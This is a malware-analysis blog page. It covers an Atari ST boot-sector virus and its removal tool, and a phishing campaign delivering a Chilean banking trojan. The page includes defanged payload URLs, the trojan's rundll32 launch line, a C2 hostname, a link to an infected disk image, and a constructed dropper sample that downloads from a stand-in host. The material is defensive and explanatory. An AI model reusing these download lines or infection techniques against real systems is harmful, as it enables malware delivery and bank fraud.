<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002D0 ADDA.L #$0000000C,A7 DFFC 0000 000C Cleans the arguments off the stack</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002D6 EORI.B #$01,$02E6 0A38 0001 02E6 Toggles the first byte of the parameter block at $02E6 for the next activation</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002DC MOVEM.L (A7)+,D1-A6 4CDF 7FFE Restores registers</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002E0 JMP $E05210 4EF9 00E0 5210 Continues in TOS ROM at $E05210</span></div>
<div><br /></div>
<div><b><u>Bibliography used</u></b></div>
<div>Atari ST Machine Language</div>
<div>Atari ST Internals</div>
<div>The ST Assembly Language Workshop</div>
<div><a href="https://st-news.com/uvk-book">UVK BOOK</a> The only site with plenty of information on Atari ST viruses. Not to be missed!</div>
<div><a href="http://www.lynn3686.com/monst.html">MonST</a><span style="font-family: arial;"> 68000 debugger</span></div>
<div><span style="font-family: arial;"><br /></span></div>
<div><span style="font-family: arial;">STEEM SSE emulator https://sourceforge.net/projects/steemsse/</span></div>
<div><span style="font-family: arial;"><br /></span></div>
<div><span style="font-family: arial;"><a href="https://drive.google.com/file/d/1yWxc0cQ-zo6noezSLIqcEP2WSa7zBdjA/view?usp=sharing">FILES</a> --- :-)</span></div>
<div><span style="font-family: arial;"><br /></span></div>
<div><span style="font-family: arial;">Gostvirus.7z - Disk image infected with the boot sector virus.</span></div>
<div><span style="font-family: arial;">DevPAC.st - Assembler utilities</span></div>
<div><span style="font-family: arial;">EasyReader - Disassembler</span></div>
<div><span style="font-family: arial;">TempleMon - Memory monitor/dump</span></div>
<div><span style="font-family: arial;">FastBasic - F.Basic assembler</span></div>
<div><span style="font-family: arial;">Antidote.prg - Program in F. Basic assembler to remove boot sector viruses, very interesting. 
See the appendix.</span></div><div><span style="font-family: arial;"><br /></span></div><div><span style="font-family: arial;">Appendix</span></div><div><span style="font-family: arial;"><br /></span></div><div><span style="font-family: arial;">Source code, in Fast Basic assembler, of a boot sector virus remover. It reads sector 1 of track 0, side 0 of drive A, sums the 256 words of the sector (TOS only executes a boot sector whose 16-bit word sum is $1234) and, on request, zeroes bytes 40 to 511 of the sector, which keeps the BPB intact but destroys the code and its checksum, before writing the sector back.</span></div><div><span style="font-family: arial;"><br /></span></div><div><span style="font-family: arial;">Magazine: <a href="http://www.atarimania.com/atari-magazine-issue-atari-st-user-vol-3-no-10_1078.html">Atari ST User vol 3 issue 10</a>, pages 53 to 59</span></div><div><span style="font-family: arial; font-size: xx-small;"><br /></span></div><div><span style="font-family: arial; font-size: xx-small;">
<div>40 \ Fast Basic assembler</div>
<div>50 RESERVE CODE,10000</div>
<div>60 F%=OPENOUT "ANTIDOTE.PRG"</div>
<div>70 PROCASSEMBLE:CLOSE#F%:STOP</div>
<div>80 HIDEMOUS :BEGINUPDATE</div>
<div>90 CALL KILL</div>
<div>100 ENDUPDAT :PROCREGISTERS</div>
<div>110 END</div>
<div>120 DEF PROCASSEMBLE</div>
<div>130 FOR PASS =1 TO 2</div>
<div>140 PC=CODE</div>
<div>150 [</div>
<div> OPT PASS,"l +D+H+W+",F%</div>
<div>KILL LEA TITLE(PC),A0</div>
<div> BSR MESSAGE</div>
<div>TEST LEA PROMPT(PC),A0</div>
<div> BSR MESSAGE</div>
<div> LEA HITMESS(PC),A0</div>
<div> BSR MESSAGE</div>
<div> BSR ENTER</div>
<div> BSR RDBOOT \Read the boot sector of drive A</div>
<div> TST D0</div>
<div> BMI FAIL \Can't read boot</div>
<div> MOVE.L #BOOT,A0 \Point to the boot sector buffer</div>
<div> MOVE.W #255,D0 \256 words = 512 bytes</div>
<div> MOVE.L #0,D1</div>
<div>SUM ADD.W (A0)+,D1 \Word sum of the sector</div>
<div> DBRA D0,SUM</div>
<div> CMP.W #$1234,D1 \TOS only executes a boot sector whose sum is $1234</div>
<div> BNE OK \Not executable, nothing to remove</div>
<div>BAD LEA VIRUS(PC),A0</div>
<div> BSR MESSAGE</div>
<div> LEA KILLMESS(PC),A0</div>
<div> BSR MESSAGE</div>
<div>YES BSR ENTER</div>
<div> CMP.B #"Y",D0</div>
<div> BEQ DIE</div>
<div> CMP.B #"y",D0</div>
<div> BNE LOOP</div>
<div>DIE MOVE.L #BOOT,A0 \Kill the virus: zero bytes 40..511, keeping the BPB</div>
<div> ADD.L #40,A0</div>
<div> MOVE.W #235,D0 \236 words = 472 bytes</div>
<div>WIPE MOVE.W #0,(A0)+</div>
<div> DBRA D0,WIPE</div>
<div> BSR WRBOOT \Write the cleaned sector back</div>
<div> TST D0</div>
<div> BMI FAIL</div>
<div>OK LEA CLEAN(PC),A0</div>
<div> BSR MESSAGE</div>
<div>LOOP LEA AGAIN(PC),A0</div>
<div> BSR MESSAGE</div>
<div> BSR ENTER</div>
<div> CMP.B #"Y",D0</div>
<div> BEQ TEST</div>
<div> CMP.B #"y",D0</div>
<div> BEQ TEST</div>
<div> LEA BYE(PC),A0</div>
<div> BSR MESSAGE</div>
<div> CLR.W -(A7) \GEMDOS Pterm0</div>
<div> TRAP #1</div>
<div> RTS</div>
<div>FAIL LEA ERMESS(PC),A0 \Error</div>
<div> BSR MESSAGE</div>
<div> BRA LOOP</div>
<div>RDBOOT \XBIOS 8 Floprd: read one sector into BOOT</div>
<div> MOVE.W #1,-(A7) \Count</div>
<div> MOVE.W #0,-(A7) \Side</div>
<div> MOVE.W #0,-(A7) \Track</div>
<div> MOVE.W #1,-(A7) \Sector start</div>
<div> MOVE.W #0,-(A7) \Drive A</div>
<div> CLR.L -(A7) \Filler</div>
<div> MOVE.L #BOOT,-(A7) \Buffer</div>
<div> MOVE.W #8,-(A7)</div>
<div> TRAP #14</div>
<div> ADD.L #20,A7</div>
<div> RTS</div>
<div>WRBOOT \XBIOS 9 Flopwr: write BOOT back as the boot sector</div>
<div> MOVE.W #1,-(A7) \Count</div>
<div> MOVE.W #0,-(A7) \Side</div>
<div> MOVE.W #0,-(A7) \Track</div>
<div> MOVE.W #1,-(A7) \Sector start</div>
<div> MOVE.W #0,-(A7) \Drive A</div>
<div> CLR.L -(A7) \Filler</div>
<div> MOVE.L #BOOT,-(A7) \Buffer</div>
<div> MOVE.W #9,-(A7)</div>
<div> TRAP #14</div>
<div> ADD.L #20,A7</div>
<div> RTS</div>
<div>MESSAGE \GEMDOS 9 Cconws: print the string at A0</div>
<div> MOVE.L A0,-(A7)</div>
<div> MOVE.W #9,-(A7)</div>
<div> TRAP #1</div>
<div> ADDQ.L #6,SP</div>
<div> RTS</div>
<div>ENTER \GEMDOS 7 Crawcin: wait for a key, returned in D0</div>
<div> CLR.W D0</div>
<div> MOVE.W #7,-(A7)</div>
<div> TRAP #1</div>
<div> ADDQ.L #2,A7</div>
<div> RTS</div>
<div>TITLE DC.B 27,"E","VIRUS KILLER" \ESC E clears the screen</div>
<div> DC.B 13,10,0</div>
<div> EVEN</div>
<div>PROMPT DC.B "PUT A DISC TO BE"</div>
<div> DC.B " TESTED INTO DRI"</div>
<div> DC.B "VE A",13,10,0</div>
<div> EVEN</div>
<div>HITMESS DC.B "HIT A KEY TO CO"</div>
<div> DC.B "NTINUE",13,10,0</div>
<div> EVEN</div>
<div>VIRUS DC.B "BOOT PROGRAM DET"</div>
<div> DC.B "ECTED",13,10,0</div>
<div> EVEN</div>
<div>KILLMESS DC.B "REMOVE [Y/N]"</div>
<div> DC.B 13,10,0</div>
<div> EVEN</div>
<div>AGAIN DC.B "ANOTHER DISC [Y/"</div>
<div> DC.B "N]",13,10,0</div>
<div> EVEN</div>
<div>ERMESS DC.B "DISC ERROR"</div>
<div> DC.B 13,10,0</div>
<div> EVEN</div>
<div>BYE DC.B "GOODBYE",13,10,0</div>
<div> EVEN</div>
<div>CLEAN DC.B "DISC SAFE",13,10,0</div>
<div> EVEN</div>
<div>BOOT DS.B 512 \Sector buffer</div>
<div> ]</div>
<div>1350 NEXT PASS</div>
<div>1360 ENDPROC</div></span></div><div><div><br /></div></div></div><p></p>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-39806443634553873812020-09-10T12:53:00.002-07:002020-09-10T12:53:48.498-07:00Hello! <p>I have neglected this humble space for a while; a new series of analyses will begin shortly.</p><p><br /></p><p>Greetings to all!</p>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-43316637785188957542017-12-05T11:48:00.001-08:002017-12-05T12:07:09.815-08:00<span style="font-family: "arial" , "helvetica" , sans-serif;">#Alerta #Malware <b>CLARO <span style="background-color: white; color: #333333; white-space: nowrap;">Tienes una factura sin pagar! </span><span style="background-color: white;">Factura #4489790</span></b></span><br />
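<p>An added example that rounds off the Atari ST boot-sector post above (it belongs to that analysis, not to the alert that follows). It is this editor's Python, not code from the post, from Antidote.prg or from the magazine listing. It applies the same test the virus depends on and the antidote checks (TOS executes a boot sector only if its 256 big-endian words sum to $1234 modulo 2^16), parses the BPB that a cleaner must preserve, shows the fix-up a loader or virus performs to land on that sum, and neutralizes an infected sector the way Antidote.prg does (zero bytes 40..511). The sector bytes, the OEM name and the stand-in "virus" bytes are constructed for the demo; the BPB values describe a standard 720K double-sided disk.</p>

```python
import struct

SECTOR_SIZE = 512
EXEC_MAGIC = 0x1234  # TOS runs the boot code only when the 256 big-endian words sum to this (mod 2^16)
# Offsets 11..29 hold the BIOS Parameter Block; unlike the 68000 code, its fields are little-endian.
BPB_FORMAT = '<HBHBHHBHHHH'
BPB_FIELDS = ('bps', 'spc', 'res', 'nfats', 'ndirs', 'nsects', 'media', 'spf', 'spt', 'nsides', 'nhid')


def boot_checksum(sector):
    """Word sum of the whole sector, as the SUM loop in Antidote.prg computes it."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError('an Atari ST boot sector is exactly 512 bytes')
    return sum(struct.unpack('>256H', sector)) & 0xFFFF


def is_executable(sector):
    """True when TOS would jump into the boot code (the antidote's 'BOOT PROGRAM DETECTED')."""
    return boot_checksum(sector) == EXEC_MAGIC


def parse_bpb(sector):
    """Bytes per sector, sectors per cluster, ... of the floppy; these must survive disinfection."""
    return dict(zip(BPB_FIELDS, struct.unpack_from(BPB_FORMAT, sector, 11)))


def make_executable(sector):
    """What a virus (or a legitimate loader) does after writing its code: patch the last word
    so that the sum lands exactly on $1234."""
    body = bytearray(sector)
    body[510:512] = b'\x00\x00'
    body[510:512] = struct.pack('>H', (EXEC_MAGIC - boot_checksum(bytes(body))) & 0xFFFF)
    return bytes(body)


def neutralize(sector):
    """The cut Antidote.prg makes: zero bytes 40..511 (236 words from BOOT+40) and keep the BPB.
    The sum then almost certainly differs from $1234; the one-in-65536 case is handled as well."""
    body = bytearray(sector)
    body[40:] = bytes(SECTOR_SIZE - 40)
    if boot_checksum(bytes(body)) == EXEC_MAGIC:
        body[511] ^= 1
    return bytes(body)


def build_clean_sector():
    """Constructed sample: a 720K double-sided disk with no boot code."""
    sector = bytearray(SECTOR_SIZE)
    sector[0:2] = b'\x60\x1c'          # BRA.S over the header
    sector[2:8] = b'Loader'            # OEM name (made up)
    sector[8:11] = b'\x01\x02\x03'     # serial number (made up)
    struct.pack_into(BPB_FORMAT, sector, 11, 512, 2, 1, 2, 112, 1440, 0xF9, 5, 9, 2, 0)
    return bytes(sector)


def build_infected_sector():
    """Constructed sample: the same disk with stand-in 'virus' bytes after the BPB and the sum fixed up."""
    sector = bytearray(build_clean_sector())
    fake_code = b'\x4a\x40\x6b\x00\x00\x44' * 40   # TST.W D0 / BMI repeated as filler, not a real virus
    sector[30:30 + len(fake_code)] = fake_code
    return make_executable(bytes(sector))


if __name__ == '__main__':
    infected = build_infected_sector()
    cleaned = neutralize(infected)
    print('clean sector executable?   ', is_executable(build_clean_sector()))
    print('infected sector executable?', is_executable(infected))
    print('cleaned sector executable? ', is_executable(cleaned),
          '| BPB intact:', parse_bpb(cleaned) == parse_bpb(infected))
```

<p>The same check is what a scanner for disk images does: read sector 0 of each image, flag the ones whose word sum is $1234, and compare their code bytes against known boot loaders before calling them viruses, since a legitimate game or language disk is executable in exactly the same way.</p>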
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><span style="background-color: white;"><br /></span></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><span style="background-color: white;"><br /></span></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">A phishing campaign is running today, using the lure "CLARO Tienes una factura sin pagar! Factura #4489790" ("Claro: you have an unpaid bill! Invoice #4489790"), that spreads malware targeting Chilean banks.</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiaFZ_K07SouxYB4Wuj20hFg8yFH6l3TTCmxhx9TGGIsmMqWu0yGrNzhSAbG8U2Eev4MVXN7Xq9__EmCNstxG5te3vlHbMtRi9Nb3pHeUFn3dwWogJL6aPDDiS5dAKHAgsJ8LXDKfuEMw/s1600/claro.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="541" data-original-width="544" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiaFZ_K07SouxYB4Wuj20hFg8yFH6l3TTCmxhx9TGGIsmMqWu0yGrNzhSAbG8U2Eev4MVXN7Xq9__EmCNstxG5te3vlHbMtRi9Nb3pHeUFn3dwWogJL6aPDDiS5dAKHAgsJ8LXDKfuEMw/s320/claro.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">hxxps[:]//bit[.]do/dVy4h</span></div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The short link above is used to download a zip with a .js file inside, encoded with a simple obfuscation: ASCII -> hex -> text, and in other cases just hex -> text.</span></div>
</div>
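<p>As an added example (this editor's Python, not the campaign's script or anything from the post), the following peels exactly that kind of layering: it finds long runs of hex digits in a script, decodes them to text, repeats while a decoded layer is itself hex, and then pulls the URLs out of the final stage. The sample script is constructed for the demo; the stub name h2s, the eval wrapper and the example.invalid URL are assumptions, not the real dropper, and the decoder does not depend on them.</p>

```python
import re
import string

# A run of at least 16 bytes written as hex digits; shorter runs are too often just hashes or colours.
HEX_RUN = re.compile(r'(?:[0-9A-Fa-f]{2}){16,}')
URL_RE = re.compile(r'https?://[^\s"\'()<>]+')
PRINTABLE = set(string.printable)


def decode_hex_layer(text):
    """Replace every long hex run that decodes to printable ASCII with its decoding.
    Returns (new_text, number_of_runs_decoded)."""
    decoded = 0

    def repl(match):
        nonlocal decoded
        candidate = bytes.fromhex(match.group(0)).decode('latin-1')
        if not set(candidate) <= PRINTABLE:
            return match.group(0)          # binary data or not text at all: leave it alone
        decoded += 1
        return candidate

    return HEX_RUN.sub(repl, text), decoded


def deobfuscate(script, max_layers=8):
    """Strip hex -> text layers until nothing decodes any more. Returns (final_script, layers_removed)."""
    layers = 0
    while layers < max_layers:
        script, n = decode_hex_layer(script)
        if n == 0:
            break
        layers += 1
    return script, layers


def extract_urls(script):
    """Sorted, de-duplicated URLs found in the (decoded) script."""
    return sorted(set(URL_RE.findall(script)))


# --- constructed sample: a two-layer dropper built here for the demo (not the real one) ---
STAGE2 = ('var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
          'x.open("GET", "http://example.invalid/wp-content/plugins/klaaaaa.jpg", false);\n'
          'x.send();\n')
H2S = ('function h2s(h){var s="";for(var i=0;i<h.length;i+=2)'
       's+=String.fromCharCode(parseInt(h.substr(i,2),16));return s;}\n')
STAGE1 = H2S + 'eval(h2s("' + STAGE2.encode('ascii').hex() + '"));\n'     # hex -> text
SAMPLE_JS = H2S + 'eval(h2s("' + STAGE1.encode('ascii').hex() + '"));\n'  # ascii -> hex -> text

if __name__ == '__main__':
    final, layers = deobfuscate(SAMPLE_JS)
    print('layers removed:', layers)
    print('URLs:', extract_urls(final))
    print(final)
```

<p>Droppers of this family vary the encoding more than the structure (decimal char codes, reversed strings, base64); the part to swap out is the decode step inside decode_hex_layer, while the loop that keeps decoding until a layer yields no new text stays the same.</p>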
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzQ5eFEJcnCdPSnU1Kbpg9cNxzOKE8Qkj02m7AO0WajDqpjvszvOAX8i0AHImAKNH1_HKIwsDMNw_3mKnTscn0UeXO_n249lXsnq7EttzGVazvNr2qZ9JBBphlKZs-Bfg9mJ4PgPXxFRY/s1600/007.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="189" data-original-width="846" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzQ5eFEJcnCdPSnU1Kbpg9cNxzOKE8Qkj02m7AO0WajDqpjvszvOAX8i0AHImAKNH1_HKIwsDMNw_3mKnTscn0UeXO_n249lXsnq7EttzGVazvNr2qZ9JBBphlKZs-Bfg9mJ4PgPXxFRY/s640/007.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The JavaScript downloads a .jpg from a compromised website, then renames it and runs it with rundll32.exe: the "image" is really a DLL, which rundll32 loads by export name regardless of the extension.</span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">hxxp[:]//www.kabobpalace[.]ca/wp-content/plugins/klaaaaa[.]jpg </span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKB9N-JJE0UYWQnxSSTEzc89YyvXfd-EwTUBL1ims0VUgyPm-PNtIjliMqtyofs1NiD637g6AFJ6KEOxYwFJ-0feCmdpaNWsNeATVSWolJ8omg7a2mRzZkroWZw1FzbpauOt1lEXP9j1Y/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="431" data-original-width="1153" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKB9N-JJE0UYWQnxSSTEzc89YyvXfd-EwTUBL1ims0VUgyPm-PNtIjliMqtyofs1NiD637g6AFJ6KEOxYwFJ-0feCmdpaNWsNeATVSWolJ8omg7a2mRzZkroWZw1FzbpauOt1lEXP9j1Y/s640/01.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">VirusTotal detection: 7/67</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjauOwuIR1T_IOUJHBDXdwT3ZzQw3UKReIErxgCYnUwI1n56omStiBF1UyYpqMmiT-0yrVqFsXFOesksFMAMTAdvWKqwm4tpZ1DbzCDZ9nrHOFHYfpklxt6gHyimUEtWJBQ4v5aNWSfNWw/s1600/VT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="442" data-original-width="1093" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjauOwuIR1T_IOUJHBDXdwT3ZzQw3UKReIErxgCYnUwI1n56omStiBF1UyYpqMmiT-0yrVqFsXFOesksFMAMTAdvWKqwm4tpZ1DbzCDZ9nrHOFHYfpklxt6gHyimUEtWJBQ4v5aNWSfNWw/s640/VT.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">It is executed on the system as follows:</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">rundll32.exe C:\\ProgramData\\KLJ5TUXBGXY941Z\<b>K9JR7C34N3372CD.dij</b>,_a</span></span><br />
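<p>For a hunt over process-creation telemetry, the command line above has three properties worth alerting on: the module handed to rundll32.exe does not end in .dll, it lives under a user-writable directory (ProgramData), and the export name is a meaningless one or two characters. The following is an added example (this editor's Python, not from the post): a small rundll32 command-line parser plus those three checks, run over a handful of constructed command lines. The second sample is the line above; the others, the directory list and the export-name heuristic are assumptions made for the demo.</p>

```python
import re
from pathlib import PureWindowsPath

# Directories any user can write to; a module loaded by rundll32 from here deserves a look (assumed list).
USER_WRITABLE = ('\\programdata\\', '\\users\\public\\', '\\appdata\\local\\temp\\', '\\windows\\temp\\')
RUNDLL = re.compile(r'(?i)(?:^|[\\\s"])rundll32(?:\.exe)?"?\s+(.+)$')
# Export names like "_a" or ordinals like "#1" carry no meaning; real ones read like Control_RunDLL.
TERSE_EXPORT = re.compile(r'^(?:_?[A-Za-z0-9]{1,2}|#\d+)$')


def _first_token(s):
    """Split off the first argument, honouring double quotes. Returns (token, remainder)."""
    s = s.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        end = len(s) if end == -1 else end
        return s[1:end], s[end + 1:]
    parts = s.split(None, 1)
    return (parts[0], parts[1] if len(parts) > 1 else '') if parts else ('', '')


def parse_rundll32(cmdline):
    """Return (module_path, export_name) for a rundll32 command line, or None if it is not one."""
    m = RUNDLL.search(cmdline)
    if not m:
        return None
    token, rest = _first_token(m.group(1).replace('\\\\', '\\'))   # logs often double the backslashes
    if ',' in token:
        module, export = token.split(',', 1)                         # path.ext,Export in one token
    else:
        module, export = token, ''
        rest = rest.lstrip()
        if rest.startswith(','):                                     # "quoted path",Export
            after = rest[1:].split(None, 1)
            export = after[0] if after else ''
    return module, export


def assess(cmdline):
    """List the reasons a rundll32 invocation looks like a loader; an empty list means nothing odd."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return []
    module, export = parsed
    reasons = []
    suffix = PureWindowsPath(module).suffix.lower()
    if suffix != '.dll':
        reasons.append('module extension is %s, not .dll' % (suffix or 'missing'))
    if any(d in module.lower() for d in USER_WRITABLE):
        reasons.append('module loaded from a user-writable directory')
    if TERSE_EXPORT.match(export):
        reasons.append('terse export name "%s"' % export)
    return reasons


def scan(cmdlines):
    """Map each flagged command line to its reasons."""
    findings = {}
    for cmdline in cmdlines:
        reasons = assess(cmdline)
        if reasons:
            findings[cmdline] = reasons
    return findings


# Constructed sample; only the second line is taken from the post.
SAMPLE_CMDLINES = [
    r'C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL',
    r'rundll32.exe C:\\ProgramData\\KLJ5TUXBGXY941Z\K9JR7C34N3372CD.dij,_a',
    r'"C:\Windows\System32\rundll32.exe" "C:\ProgramData\Some Vendor\updater.dll",Run',
    r'rundll32.exe C:\Users\Public\photo.jpg,#1',
    r'C:\Windows\System32\cmd.exe /c whoami',
]

if __name__ == '__main__':
    for cmdline, reasons in scan(SAMPLE_CMDLINES).items():
        print(cmdline)
        for reason in reasons:
            print('   -', reason)
```

<p>The extension check alone would have caught this sample, but a signed vendor updater in ProgramData will trip the directory check, so the reasons are returned as a list and the alert threshold is left to the consumer rather than baked into the parser.</p>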
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">The body of the trojan contains obfuscated strings.</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfWEdqL4AkEM1fA85drjTgeZ3pgHfd6Tsb3lsnotxODoCoNnQ7TblmqKnygZnIWnR2Q2PMyNgXIeCqWod1SCZYHIvCTu83P5Cs7CGt_IDAqXvH50RGQbORjwuW-f3jBn5GLuiiHiatOl8/s1600/008.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="783" height="416" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfWEdqL4AkEM1fA85drjTgeZ3pgHfd6Tsb3lsnotxODoCoNnQ7TblmqKnygZnIWnR2Q2PMyNgXIeCqWod1SCZYHIvCTu83P5Cs7CGt_IDAqXvH50RGQbORjwuW-f3jBn5GLuiiHiatOl8/s640/008.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">From them we can recover the following interesting strings: what look like command tags (<|Folder|>, <|DownloadFile|>, ...), TASKKILL fragments next to browser names, the messages shown to the victim, the Run key used for persistence and a dynamic-DNS hostname:</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><|Folder|></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><|Files|></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><|DownloadFile|></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><|UploadFile|></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">VALOR - </span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">TASKKILL /F /</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Internet</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Google</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Mozilla</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">TASKKILL /F /]</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">En este momento estamos efectuando una modificacion (we are currently making a modification)</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">En este momento no podemos atenderlo (we cannot attend to you right now)</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">Hola, Enviamos un codigo como simulacion de transaccion (hello, we sent a code as a transaction simulation)</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">Su sistema será reiniciado (your system will be restarted)</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Los datos ingresados son incorrectos (the data entered is incorrect)</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Ingrese el codigo (enter the code)</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">\Software\Microsoft\Windows\CurrentVersion\Run</span><br />
<b style="font-family: Arial, Helvetica, sans-serif;">chile.ddns.com.br</b><br />
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<b style="font-family: Arial, Helvetica, sans-serif;">We can also extract the fake images that are shown to the victim to steal the coordinate-card values or the tokens used to authorize transfers.</b><br />
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz8jY5lEoM4iV8ABi4p6sGRNHFoxOwO26VhL8ffhT1apWDqnv9lf_1d10AoAtRSMN47p4IWTz4PHrNyRCkunq4KszHOPWuEY0diDHncXCHY6k5NZqZEYpGrRbV_m9SDmDoGZmoGsUGUME/s1600/0005.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="451" data-original-width="423" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz8jY5lEoM4iV8ABi4p6sGRNHFoxOwO26VhL8ffhT1apWDqnv9lf_1d10AoAtRSMN47p4IWTz4PHrNyRCkunq4KszHOPWuEY0diDHncXCHY6k5NZqZEYpGrRbV_m9SDmDoGZmoGsUGUME/s320/0005.jpg" width="300" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
